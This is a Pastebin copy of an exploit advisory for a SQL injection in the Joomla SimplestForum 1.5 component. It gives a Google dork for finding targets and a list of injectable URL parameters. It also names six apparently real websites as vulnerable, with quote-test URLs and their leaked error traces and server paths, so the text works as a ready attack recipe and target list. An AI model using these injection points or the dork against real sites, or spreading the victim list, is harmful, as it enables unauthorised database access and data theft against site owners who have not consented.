Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla SimplestForum Components 1.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomlacode.org ~ simplestforum.org
- # Software Download Link : joomfans.com/joomla-components/simplest-forum-multilanguage-joomla-15.html
- # Software Information Link : joomlacode.org/gf/project/simplestforum/
- # Software Version : 1.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_simplestforum''
- intext:Designed by Methealth Administrators Namibia.
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010297
- packetstormsecurity.com/files/151435/Joomla-SimplestForum-1.5-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- Simplest Forum Joomla! is simplest and easiest to use forum component. It
- provides a super basic interface for both users and administrators while
- still being useful. Simplest Forum is Joomla! 1.5's first fully native forum.
- ####################################################################
- # Impact :
- ***********
- * An attacker might be able inject and/or alter existing
- SQL statements which would influence the database exchange.
- * SQL injection vulnerability in the Joomla SimplestForum Components 1.5 because,
- it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- * On the other hand, this component simplestforum for Joomla! allows
- remote attackers to execute arbitrary SQL commands
- via the " view= forumId= Itemid= limitstart= parentId= "
- with different parameters action to index.php.
- * Exploiting this issue could allow an attacker to compromise the application, read,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- If the webserver is misconfigured, read & write access to the filesystem may be possible.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_simplestforum&view=[SQL Injection]
- /index.php?option=com_simplestforum&view=postlist&forumId=[SQL Injection]
- /index.php?option=com_simplestforum&view=forumlist&Itemid=[SQL Injection]
- /index.php?option=com_simplestforum&view=postlist&forumId=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_simplestforum&view=postlist&forumId=[ID-NUMBER]&&limitstart=[SQL Injection]
- /index.php?option=com_simplestforum&view=postlist&topic=true&forumId=[ID-NUMBER]&parentId=[SQL Injection]
- /index.php?option=com_simplestforum&view=postlist&forumId=[ID-NUMBER]&parentId=[ID-NUMBER]&topic=true&Itemid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] coitama.es/index.php?option=com_simplestforum&view=forumlist&Itemid=18%27
- [+] healthsmartcard.com.na/index.php?option=com_simplestforum&view=postlist&forumId=1&Itemid=57%27
- [+] ekszi.hu/index.php?option=com_simplestforum&view=postlist&forumId=4&Itemid=63%27
- [+] ashorooq.net/index.php?option=com_simplestforum&view=postlist&forumId=22&limitstart=30%27
- [+] talingchan-bpi.go.th/index.php?option=com_simplestforum&view=postlist&topic=true&forumId=1&parentId=1%27
- [+] bls-pleven.org/index.php?option=com_simplestforum&view=postlist&forumId=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Warning: Parameter 1 to AmbitionalityHelperTree::_calculateDepth() expected
- to be a reference, value given in G:\healthsmartcard.com.na
- \components\com_simplestforum\helpers\tree.php on line 72
- Fatal error: Uncaught exception 'Exception' with message
- 'Invalid forum supplied for verifyPermissions' in /web/ekszi/ekszi.hu/components
- /com_simplestforum/helpers/forum.php:110 Stack trace: #0
- /web/ekszi/ekszi.hu/components/com_simplestforum/models/postlist.php
- (158): ForumHelper->verifyPermissions('view', '4') #1
- /web/ekszi/ekszi.hu/components/com_simplestforum/views/postlist
- /view.html.php(59): SimplestForumModelPostList->getData() #2
- /web/ekszi/ekszi.hu/libraries/joomla/application/component/controller.php
- (310): SimplestForumViewPostList->display() #3 /web/ekszi/ekszi.hu
- /components/com_simplestforum/controller.php(41): JController->
- display(NULL) #4 /web/ekszi/ekszi.hu/libraries/joomla/application
- /component/controller.php(236): SimplestForumController->display()
- #5 /web/ekszi/ekszi.hu/components/com_simplestforum/simplestforum.php(31):
- JController->execute(NULL) #6 /web/ekszi/ekszi.hu/libraries
- /joomla/application/component/helper.php(162): require_once
- ('/web/ekszi/eksz...') #7 /web/ekszi/ekszi.hu/includes/application.php
- in /web/ekszi/ekszi.hu/components/com_simplestforum/helpers/forum.php on line 110
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement